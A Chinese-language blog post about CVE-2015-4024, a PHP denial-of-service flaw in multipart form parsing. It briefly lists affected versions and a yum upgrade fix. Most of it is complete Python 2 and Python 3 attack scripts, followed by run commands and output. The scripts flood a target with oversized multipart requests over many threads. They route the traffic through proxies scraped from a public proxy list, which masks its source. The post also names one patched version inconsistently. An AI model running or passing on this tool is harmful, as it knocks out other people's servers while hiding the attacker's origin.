在 2015/4/3 有一位百度大神向 PHP 官方提報了一項有關 PHP 的重大漏洞
此重大漏洞的 CVE 報告為 CVE-2015-4024,此漏洞將造成使用 php 的服務主機大量消耗 CPU 100%,達到 Dos 攻擊。
由於使用 php 佈署的站台非常多,並且受影響的 PHP 版本範圍之大如下
- PHP 5.0.0 – 5.0.5
- PHP 5.1.0 – 5.1.6
- PHP 5.2.0 – 5.2.17
- PHP 5.3.0 – 5.3.29
- PHP 5.4.0 – 5.4.40
- PHP 5.5.0 – 5.5.24
- PHP 5.6.0 – 5.6.8
PHP 官方也在 2015/5/14 緊急釋出了小版本更新,目前僅提供以下版本更新
- PHP 5.5.41
- PHP 5.5.25
- PHP 5.6.9
可以直接 yum 升級 PHP 版本解決
$ yum update php $ php -v PHP 5.4.41 (cli) (built: May 14 2015 23:37:34) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.4.0, Copyright (c) 1998-2014 Zend Technologies
請認明 PHP 5.4.41 (cli) (built: May 14 2015 23:37:34) 以確保版本正確。
Dos 攻擊示範測試
step.1 建立攻擊腳本
- Python2
#!/usr/bin/env python
# Author: scott
# coding:utf-8
if __name__ == '__main__':
#unittest.main()
pass
import sys
import urllib
import urllib2
import datetime
import re
import os
import threading
import time
import random
from optparse import OptionParser
from multiprocessing import Pool
import string
import random
#----------------------------------------------------------------------
def generate_string(stat, length):
"""(str,int)->str
generate string as required."""
stat_final = ''
if 'u' in str(stat).lower():
stat_final += string.ascii_uppercase
if 'l' in str(stat).lower():
stat_final += string.ascii_lowercase
if 'd' in str(stat).lower():
stat_final += string.digits
return ''.join(random.SystemRandom().choice(stat_final) for _ in range(int(length)))
def check_php_multipartform_dos(url, post_body, headers, ip):
try:
proxy_handler = urllib2.ProxyHandler({"http": ip})
null_proxy_handler = urllib2.ProxyHandler({})
opener = urllib2.build_opener(proxy_handler)
urllib2.install_opener(opener)
req = urllib2.Request(url)
for key in headers.keys():
req.add_header(key, headers[key])
starttime = datetime.datetime.now()
fd = urllib2.urlopen(req, post_body)
html = fd.read()
endtime = datetime.datetime.now()
usetime = (endtime - starttime).seconds
if(usetime > 5):
result = url + " is vulnerable"
else:
if(usetime > 3):
result = "need to check normal respond time"
return [result, usetime]
except KeyboardInterrupt:
exit()
def get_stock_html(URL):
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
)
opener.addheaders = [
('User-agent',
'Mozilla/4.0 (compatible;MSIE 7.0;'
'Windows NT 5.1; .NET CLR 2.0.50727;'
'.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
]
url = "http://proxy.com.ru/%s" % URL
response = opener.open(url)
return ''.join(response.readlines())
def Getting_Url():
global CC_Url
file = open('url', 'r')
CC_Url = file.readlines()
file.close()
def Getting_list():
global IP_Port
IP_Port = []
for html_list in re.findall('list_\d+.html', get_stock_html("list_1.html")):
print "getting %s's IP:PORT" % html_list
IP_Port += eval(re.sub('</td><td>', ':', "%s" %
re.findall('\d+.\d+.\d+.\d+<\/td><td>\d+', get_stock_html(html_list))))
def main():
parser = OptionParser()
parser.add_option("-t", "--target", action="store",
dest="target",
default=False,
type="string",
help="test target")
parser.add_option("-x", "--thread", action="store",
dest="thread",
default=250,
type="int",
help="thread")
parser.add_option("-r", "--request_num", action="store",
dest="request_num",
default= 350000,
type="int",
help="thread")
(options, args) = parser.parse_args()
if options.target:
target = options.target
thread = options.thread
request_num = options.request_num
else:
return
Num = request_num
random_boundary = generate_string('ulr', 16)
headers = {
'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundary{random_boundary}'.format(random_boundary = random_boundary),
'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
body = "------WebKitFormBoundary{random_boundary}\nContent-Disposition: form-data; name=\"file\"; filename={random_name}.jpg".format(random_boundary = random_boundary, random_name = generate_string('ulr', 8))
payload = ""
for i in range(0, Num):
payload = payload + "a\n"
body = body + payload
body = body + \
"Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------{random_boundary}".format(random_boundary = random_boundary)
print "starting..."
try:
Getting_list()
print('PROXY LIST READY')
pool = Pool(int(thread))
for ip in IP_Port:
pool.apply_async(
check_php_multipartform_dos,
[target,
body,
headers,
ip])
pool.close()
pool.join()
except KeyboardInterrupt:
print('EXIT')
exit()
if __name__ == "__main__":
main()
exit()
- Python3
#!/usr/bin/env python3
# Author: scott
# coding:utf-8
from __future__ import with_statement, print_function
from optparse import OptionParser
from multiprocessing import Pool
import sys
try:
import urllib2
except:
import urllib.request as urllib2
import datetime
import re
import os
import threading
import time
import random
# Just put it here for now
request_num = 350000
#worker_num = 500
def check_php_multipartform_dos(url, post_body, headers, ip):
try:
proxy_handler = urllib2.ProxyHandler({"http": ip})
null_proxy_handler = urllib2.ProxyHandler({})
opener = urllib2.build_opener(proxy_handler)
urllib2.install_opener(opener)
req = urllib2.Request(url)
for key in headers.keys():
req.add_header(key, headers[key])
starttime = datetime.datetime.now()
fd = urllib2.urlopen(req, post_body)
html = fd.read()
endtime = datetime.datetime.now()
usetime = (endtime - starttime).seconds
if(usetime > 5):
result = url+" is vulnerable"
else:
if(usetime > 3):
result = "need to check normal respond time"
return [result, usetime]
except KeyboardInterrupt:
exit()
# end
def get_stock_html(URL):
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
)
opener.addheaders = [
('User-agent',
'Mozilla/4.0 (compatible;MSIE 7.0;'
'Windows NT 5.1; .NET CLR 2.0.50727;'
'.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
]
url = "http://proxy.com.ru/%s" % URL
response = opener.open(url)
return str(b''.join(response.readlines()))
def getting_list():
global IP_Port
IP_Port = []
for html_list in re.findall('list_\d+.html', get_stock_html(
"list_1.html")):
print("getting %s's IP:PORT" % html_list)
IP_Port += eval(re.sub('</td><td>', ':', "%s" %
re.findall(
'\d+.\d+.\d+.\d+<\/td><td>\d+',
get_stock_html(html_list))))
def main():
parser = OptionParser()
parser.add_option("-t", "--target", action="store",
dest="target",
default=False,
type="string",
help="test target")
parser.add_option("-x", "--thread", action="store",
dest="thread",
default=250,
type="int",
help="thread")
parser.add_option("-r", "--request_num", action="store",
dest="request_num",
default= 350000,
type="int",
help="request_num")
(options, args) = parser.parse_args()
if options.target:
target = options.target
thread = options.thread
request_num = options.request_num
else:
return
headers = {}
headers["Content-Type"] = "multipart/form-data; boundary="
headers["Content-Type"] += "----WebKitFormBoundaryX3B7rDMPcQlzmJE1"
headers["Accept-Encoding"] = "gzip, deflate"
headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) "
headers["User-Agent"] += "AppleWebKit/537.36 (KHTML, like Gecko) "
headers["User-Agent"] += "Chrome/40.0.2214.111 Safari/537.36"
body = b"------WebKitFormBoundaryX3B7rDMPcQlzmJE1\n"
body += b"Content-Disposition: form-data; name=\"file\"; filename=sp.jpg"
payload = b""
for i in range(0, request_num):
payload += b"a\n"
body += payload
body += b"Content-Type: application/octet-stream\r\n\r\ndatadata\r\n"
body += b"------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
print("starting...")
getting_list()
try:
pool = Pool(thread)
for ip in IP_Port:
pool.apply_async(check_php_multipartform_dos,
[target, body, headers, ip])
pool.close()
pool.join()
except KeyboardInterrupt:
print('EXIT')
exit()
if __name__ == "__main__":
main()
exit()
step.2 執行腳本
$ python cve20154024.py -t IP -x 線程數 -r "350000" starting... getting list_1.html's IP:PORT getting list_2.html's IP:PORT getting list_3.html's IP:PORT getting list_4.html's IP:PORT getting list_5.html's IP:PORT getting list_6.html's IP:PORT getting list_7.html's IP:PORT getting list_8.html's IP:PORT getting list_9.html's IP:PORT getting list_10.html's IP:PORT getting list_11.html's IP:PORT getting list_2.html's IP:PORT getting list_3.html's IP:PORT getting list_4.html's IP:PORT getting list_5.html's IP:PORT getting list_6.html's IP:PORT getting list_7.html's IP:PORT getting list_8.html's IP:PORT getting list_9.html's IP:PORT getting list_10.html's IP:PORT getting list_11.html's IP:PORT PROXY LIST READY
Example :
$ python cve20154024.py -t 192.168.10.10 -x 50 -r "350000"
其中 350000 解釋為,當存在 350000行 a\n 時,一個 http request 可以消耗 CPU 10s,如果同時有 50 甚至更多線程同時攻擊,可見能造成的 Loading 有多大。
